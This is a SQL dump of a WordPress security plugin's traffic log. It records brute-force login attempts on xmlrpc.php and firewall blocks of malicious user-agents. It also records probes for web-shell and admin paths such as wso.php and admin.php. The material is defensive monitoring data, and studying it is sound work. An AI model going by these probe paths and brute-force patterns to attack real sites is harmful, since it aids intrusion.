(51207, 0.000000, 1712319640.378482, '\0\0\0\0\0\0\0\0\0\0ÿÿp†£W', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51208, 0.000000, 1712319645.683477, '\0\0\0\0\0\0\0\0\0\0ÿÿz±l¾', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51209, 0.000000, 1712319650.230419, '\0\0\0\0\0\0\0\0\0\0ÿÿoëAN', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51210, 0.000000, 1712319651.372379, '\0\0\0\0\0\0\0\0\0\0ÿÿËÖS–', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51211, 0.000000, 1712319651.556787, '\0\0\0\0\0\0\0\0\0\0ÿÿ³ÿ4¤', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51212, 0.000000, 1712319660.070609, '\0\0\0\0\0\0\0\0\0\0ÿÿßÌå5', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51213, 0.000000, 1712319664.006840, '\0\0\0\0\0\0\0\0\0\0ÿÿ´òD\\', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51214, 0.000000, 1712319667.448365, '\0\0\0\0\0\0\0\0\0\0ÿÿ³\0o*', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51215, 0.000000, 1712319678.766690, '\0\0\0\0\0\0\0\0\0\0ÿÿ{ç}-', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51216, 0.000000, 1712319679.995265, '\0\0\0\0\0\0\0\0\0\0ÿÿ“[+', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51217, 0.000000, 1712319684.686163, '\0\0\0\0\0\0\0\0\0\0ÿÿo}ÝÊ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51218, 0.000000, 1712319697.533961, '\0\0\0\0\0\0\0\0\0\0ÿÿ¡1g:', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51219, 0.000000, 1712319700.224850, '\0\0\0\0\0\0\0\0\0\0ÿÿYä', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51220, 0.000000, 1712319700.145014, '\0\0\0\0\0\0\0\0\0\0ÿÿ´¿;;', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51221, 0.000000, 1712319704.577157, '\0\0\0\0\0\0\0\0\0\0ÿÿw^oÜ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51222, 0.000000, 1712319706.854422, '\0\0\0\0\0\0\0\0\0\0ÿÿ1ÌØ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51223, 0.000000, 1712319709.837973, '\0\0\0\0\0\0\0\0\0\0ÿÿ¨ÂèH', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51224, 0.000000, 1712319710.440698, '\0\0\0\0\0\0\0\0\0\0ÿÿ<5[Ï', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51225, 0.000000, 1712319729.529629, '\0\0\0\0\0\0\0\0\0\0ÿÿ1%u‘', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51226, 0.000000, 1712319732.592543, '\0\0\0\0\0\0\0\0\0\0ÿÿfÛÚÕ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51227, 0.000000, 1712319738.767233, '\0\0\0\0\0\0\0\0\0\0ÿÿ1Ïö÷', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51228, 0.000000, 1712319739.071828, '\0\0\0\0\0\0\0\0\0\0ÿÿˆž(&', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51229, 0.000000, 1712319740.926888, '\0\0\0\0\0\0\0\0\0\0ÿÿg_–=', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51230, 0.000000, 1712319741.579321, '\0\0\0\0\0\0\0\0\0\0ÿÿuÛ…ž', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51231, 0.000000, 1712319750.634501, '\0\0\0\0\0\0\0\0\0\0ÿÿ¼PG{', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51232, 0.000000, 1712319758.128864, '\0\0\0\0\0\0\0\0\0\0ÿÿsöáŠ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51233, 0.000000, 1712319760.375398, '\0\0\0\0\0\0\0\0\0\0ÿÿS+ˆR', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51234, 0.000000, 1712319762.439422, '\0\0\0\0\0\0\0\0\0\0ÿÿ¿r¬', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51235, 0.000000, 1712319768.638168, '\0\0\0\0\0\0\0\0\0\0ÿÿ)i·±', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51236, 0.000000, 1712319772.828749, '\0\0\0\0\0\0\0\0\0\0ÿÿiáýõ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51237, 0.000000, 1712319773.752834, '\0\0\0\0\0\0\0\0\0\0ÿÿÕ¬’', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51238, 0.000000, 1712319776.009457, '\0\0\0\0\0\0\0\0\0\0ÿÿƒÝãG', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51239, 1712319785.717273, 1712319785.096000, '\0\0\0\0\0\0\0\0\0\0ÿÿo}ÝÊ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3dwLWxvZ2luLnBocA=="}'),
(51240, 0.000000, 1712319790.121153, '\0\0\0\0\0\0\0\0\0\0ÿÿ-â', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51241, 0.000000, 1712319792.319793, '\0\0\0\0\0\0\0\0\0\0ÿÿsöŠ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51242, 0.000000, 1712319796.740483, '\0\0\0\0\0\0\0\0\0\0ÿÿx8Ñ_', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51243, 0.000000, 1712319795.838008, '\0\0\0\0\0\0\0\0\0\0ÿÿOr7B', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51244, 0.000000, 1712319799.456741, '\0\0\0\0\0\0\0\0\0\0ÿÿ±R„#', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51245, 0.000000, 1712319811.340389, '\0\0\0\0\0\0\0\0\0\0ÿÿ´Â);', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51246, 0.000000, 1712319812.322844, '\0\0\0\0\0\0\0\0\0\0ÿÿm\\±[', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51247, 0.000000, 1712319816.956201, '\0\0\0\0\0\0\0\0\0\0ÿÿ%ûÝ4', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51248, 0.000000, 1712319821.239731, '\0\0\0\0\0\0\0\0\0\0ÿÿ}?uF', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51249, 0.000000, 1712319824.371359, '\0\0\0\0\0\0\0\0\0\0ÿÿ;™Vv', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51250, 0.000000, 1712319826.653878, '\0\0\0\0\0\0\0\0\0\0ÿÿ|‚"', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51251, 0.000000, 1712319827.300364, '\0\0\0\0\0\0\0\0\0\0ÿÿxXJ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51252, 0.000000, 1712319838.738328, '\0\0\0\0\0\0\0\0\0\0ÿÿÁ*e', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51253, 0.000000, 1712319840.331363, '\0\0\0\0\0\0\0\0\0\0ÿÿEÀ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51254, 0.000000, 1712319845.362162, '\0\0\0\0\0\0\0\0\0\0ÿÿÅù)£', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51255, 0.000000, 1712319846.057663, '\0\0\0\0\0\0\0\0\0\0ÿÿ/	+$', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51256, 0.000000, 1712319847.004888, '\0\0\0\0\0\0\0\0\0\0ÿÿ¡\0›|', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51257, 0.000000, 1712319848.633737, '\0\0\0\0\0\0\0\0\0\0ÿÿ˜:‡', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51258, 0.000000, 1712319861.234479, '\0\0\0\0\0\0\0\0\0\0ÿÿqÒfn', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51259, 0.000000, 1712319863.901633, '\0\0\0\0\0\0\0\0\0\0ÿÿVyC·', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51260, 0.000000, 1712319869.371669, '\0\0\0\0\0\0\0\0\0\0ÿÿ^Civ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51261, 0.000000, 1712319870.063712, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹Ââˆ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51262, 0.000000, 1712319871.717946, '\0\0\0\0\0\0\0\0\0\0ÿÿÔ:gî', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51263, 0.000000, 1712319873.346631, '\0\0\0\0\0\0\0\0\0\0ÿÿO<È', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51264, 0.000000, 1712319878.780881, '\0\0\0\0\0\0\0\0\0\0ÿÿ±J¸×', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51265, 0.000000, 1712319890.405119, '\0\0\0\0\0\0\0\0\0\0ÿÿgÔž', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51266, 0.000000, 1712319898.077004, '\0\0\0\0\0\0\0\0\0\0ÿÿ1ÍPV', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51267, 0.000000, 1712319899.352200, '\0\0\0\0\0\0\0\0\0\0ÿÿ:P|', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51268, 0.000000, 1712319911.352100, '\0\0\0\0\0\0\0\0\0\0ÿÿ¥ÀÊ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51269, 0.000000, 1712319913.440633, '\0\0\0\0\0\0\0\0\0\0ÿÿE |â', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51270, 0.000000, 1712319914.227218, '\0\0\0\0\0\0\0\0\0\0ÿÿ]W|', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51271, 0.000000, 1712319917.919894, '\0\0\0\0\0\0\0\0\0\0ÿÿ{çŸ¢', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51272, 0.000000, 1712319919.227986, '\0\0\0\0\0\0\0\0\0\0ÿÿuË±š', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51273, 0.000000, 1712319920.591991, '\0\0\0\0\0\0\0\0\0\0ÿÿQút', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51274, 0.000000, 1712319925.068704, '\0\0\0\0\0\0\0\0\0\0ÿÿg1Êr', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51001, 1712207999.383435, 1712207998.927800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/xmrlpc.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3htcmxwYy5waHA=","category":"brute-force","ssl":1}'),
(50964, 1712207597.762263, 1712207597.291300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/network.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L25ldHdvcmsucGhw","category":"brute-force","ssl":1}'),
(50966, 1712207563.608301, 1712207563.132700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/wso.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dzby5waHA=","category":"brute-force","ssl":1}'),
(50965, 1712207580.431769, 1712207580.040500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/cong.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NvbmcucGhw","category":"brute-force","ssl":1}'),
(50443, 1711358296.623791, 1711358296.312500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/admin.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FkbWluLnBocA==","category":"brute-force","ssl":1}'),
(51689, 1712368010.477759, 1712368010.113800, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-3dbanner-rotator/readme.txt', NULL, 'Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/3.8', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC0zZGJhbm5lci1yb3RhdG9yL3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC0zZGJhbm5lci1yb3RhdG9yL3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51511, 0.000000, 1712320918.569774, '\0\0\0\0\0\0\0\0\0\0ÿÿ''{tü', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51512, 0.000000, 1712320920.160325, '\0\0\0\0\0\0\0\0\0\0ÿÿ°=žµ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51513, 0.000000, 1712320929.526749, '\0\0\0\0\0\0\0\0\0\0ÿÿgµã´', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51514, 0.000000, 1712320930.429848, '\0\0\0\0\0\0\0\0\0\0ÿÿfºš', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
